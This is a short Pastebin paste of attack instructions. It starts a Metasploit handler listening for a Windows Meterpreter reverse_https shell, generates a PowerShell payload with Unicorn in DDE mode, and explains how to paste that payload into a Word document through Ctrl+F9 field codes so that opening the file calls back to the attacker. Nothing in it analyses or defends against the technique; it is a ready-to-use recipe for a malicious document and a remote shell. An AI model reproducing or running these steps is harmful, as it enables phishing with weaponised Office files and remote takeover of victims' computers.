Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Start Meterpreter reverse_tcp handler with IP:
- IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
- msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_https;set LHOST '$IP';set LPORT 443; set ExitOnSession false;exploit -j -z"
- # Generate Unicorn Payload:
- IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
- python unicorn.py windows/meterpreter/reverse_https $IP 443 dde
- leafpad powershell_attack.txt
- open new word document , press ctrl+F9
- paste into contents of powershell_attack.txt and save
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement